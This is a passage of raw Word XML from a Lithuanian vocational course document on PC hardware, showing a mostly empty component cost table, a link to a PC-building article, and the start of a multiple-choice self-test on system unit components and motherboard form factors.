              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4E2957EC" w14:textId="76A645BF" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="231ED0A1" w14:textId="2A6EC5C8" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="20C33EAE" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7204A822" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Operacinė sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="37B30B46" w14:textId="2E6C0EC8" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6AC45E0F" w14:textId="7D7FE473" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0A59594B" w14:textId="097C3813" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="4ECF361C" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7D486808" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Monitorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5DCBFE67" w14:textId="54280A26" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="75EBAD3A" w14:textId="7F5AA991" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6D6174EA" w14:textId="027FE401" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="26F0AE07" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7E5BA8CF" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Klavviatūra + pelė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1D6808D5" w14:textId="284EC4A1" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3B27A221" w14:textId="4E6C358A" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7A83A227" w14:textId="1F1A48EC" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A06B35" w:rsidRPr="005A5C28" w14:paraId="283689C0" w14:textId="77777777" w:rsidTr="10C2F772">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7A50FFC2" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>IŠ VISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="10709EAE" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4B842D96" w14:textId="77777777" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="28D5AC0F" w14:textId="70DA11A1" w:rsidR="00A06B35" w:rsidRPr="005A5C28" w:rsidRDefault="00A06B35" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4345C788" w14:textId="77777777" w:rsidR="0041072E" w:rsidRPr="005A5C28" w:rsidRDefault="0041072E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="596C45DA" w14:textId="77777777" w:rsidR="00BA57B0" w:rsidRPr="005A5C28" w:rsidRDefault="00BA57B0" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="724F7555" w14:textId="123D6C31" w:rsidR="0041072E" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pa</w:t>
      </w:r>
      <w:r w:rsidR="0041072E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pildomi informacijos šaltiniai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016AED58" w14:textId="3506B107" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="0041072E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Mix. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">9 things I learned building my first PC (that I wish I knew before) </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">TNW. </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId200" w:history="1">
        <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://thenextweb.com/plugged/2019/12/22/build-pc-tips-computer/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E1FF0AD" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A612765" w14:textId="1FEEC189" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="003D0977" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00605244" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> užduotis</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00922E39" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>TESTAS.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ĮSIVERTINTI</w:t>
      </w:r>
      <w:r w:rsidR="00D81CFC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>NK</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>MODULIO TEORINIŲ ŽINIŲ GEBĖJIM</w:t>
      </w:r>
      <w:r w:rsidR="00D81CFC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C310729" w14:textId="6CED7581" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00D81CFC" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kurie</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0A90FA57" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>komponentai reikalingi</w:t>
      </w:r>
      <w:r w:rsidR="00B35968" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sisteminio bloko </w:t>
      </w:r>
      <w:r w:rsidR="0056205A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>veik</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>imui?</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="10" w:name="_Hlk67741006"/>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pažymėk</w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> tinkamą atsakymą</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:p w14:paraId="2FEC95F3" w14:textId="3966EFDB" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00FB2EDE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>agrindinė plokštė, procesorius, aušintuvas, RAM, standusis diskas, vaizdo plokštė, maitinimo blokas, korpusas</w:t>
      </w:r>
      <w:r w:rsidR="00D81CFC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22414E0A" w14:textId="0233A7A7" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00FB2EDE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>agrindinė plokštė, procesorius, aušintuvas, RAM, standusis diskas;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5BA967" w14:textId="20A40089" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00FB2EDE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>agrindinė plokštė, procesorius, aušintuvas, RAM, standusis diskas, tinklo plokštė, garso plokštė, papildomas aušinimas, optinis įrenginys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7EB11A" w14:textId="2BBBA7FE" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605D26BB" w14:textId="2BD54213" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="00D81CFC" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kuriuos</w:t>
      </w:r>
      <w:r w:rsidR="37734BC4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>formos faktorius turi dabartinės pagrindinės plokštės?</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėk</w:t>
      </w:r>
      <w:r w:rsidR="002706A1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ite</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> tinkamą atsakymą</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A3D089" w14:textId="35DCFFA6" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>A)</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:tab/>
        <w:t xml:space="preserve"> E-ATX,ATX, mATX, mini-ITX</w:t>
      </w:r>
      <w:r w:rsidR="00D81CFC" w:rsidRPr="005A5C28">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57841A98" w14:textId="45160705" w:rsidR="009D5F8C" w:rsidRPr="005A5C28" w:rsidRDefault="009D5F8C" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>B)</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:t>B-ATX, ATX, mATX, mini-ITX</w:t>
      </w:r>
      <w:r w:rsidR="00D81CFC" w:rsidRPr="005A5C28">
        <w:t>;</w:t>
      </w:r>
    </w:p>
